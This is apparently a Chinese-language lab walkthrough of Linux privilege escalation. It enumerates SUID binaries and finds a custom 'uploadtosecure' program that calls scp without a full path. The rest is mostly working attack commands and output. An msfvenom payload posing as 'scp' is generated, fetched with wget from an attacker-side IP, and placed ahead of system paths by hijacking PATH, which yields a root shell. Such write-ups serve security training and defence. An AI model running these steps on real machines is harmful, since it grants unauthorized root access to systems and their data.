SUID Binaries Priv-Esc

枚举 SUID 程序

-rwsr-xr-x 1 root root 26564 2007-01-30 18:10 /bin/ping6
-rwsr-xr-x 1 root root 30736 2007-01-30 18:10 /bin/ping
-rwsr-xr-x 1 root root 76896 2007-02-21 12:48 /bin/mount
-rwsr-xr-x 1 root root 56984 2007-02-21 12:48 /bin/umount
-rwsr-xr-x 1 root root 27000 2007-02-27 02:53 /bin/su
-rwsr-xr-x 1 root root 9580 2007-07-30 16:41 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 142156 2007-03-05 11:38 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 37248 2007-02-27 02:53 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18060 2006-11-23 15:58 /usr/bin/traceroute.lbl
-rwsr-xr-x 1 root root 32064 2007-02-27 02:53 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 37800 2006-01-03 02:15 /usr/bin/at
-rwsr-xr-x 1 root root 837304 2007-03-07 17:16 /usr/bin/gpg
-rwsr-xr-x 2 root root 91700 2006-04-15 03:39 /usr/bin/sudo
-rwsr-xr-x 1 root root 6923 2008-10-07 19:38 /usr/local/bin/uploadtosecure

搜索发现 uploadtosecure 不属于常见程序，可能存在利用

-rwsr-xr-x 1 root root 6923 2008-10-07 19:38 /usr/local/bin/uploadtosecure

检查字符串

strings /usr/local/bin/uploadtosecure

输出

/lib/ld-linux.so.2 
__gmon_start__ 
libc.so.6  
_IO_stdin_used
puts  
system  
__libc_start_main 
GLIBC_2.0 
PTRh0 
[^_] 
Archiving files to secure server...
scp -r file/tobesecured/* 10.10.11.100:/var/www/html/files/

其中一条命令是调用 scp 进行文件传输，可以通过劫持 scp 进行恶意利用

scp -r file/tobesecured/* 10.10.11.100:/var/www/html/files/

生成利用程序

msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o scp

下载到 /tmp 并修改权限

wget http://192.168.0.167/scp -O /tmp/scp

chmod 755 /tmp/scp

修改 PATH

export PATH=/tmp:$PATH

echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/games

运行二进制程序，触发利用

~$ /usr/local/bin/uploadtosecure

Archiving files to secure server...
sh-3.1# id
uid=1001(bob) gid=1001(bob) euid=0(root) groups=1001(bob)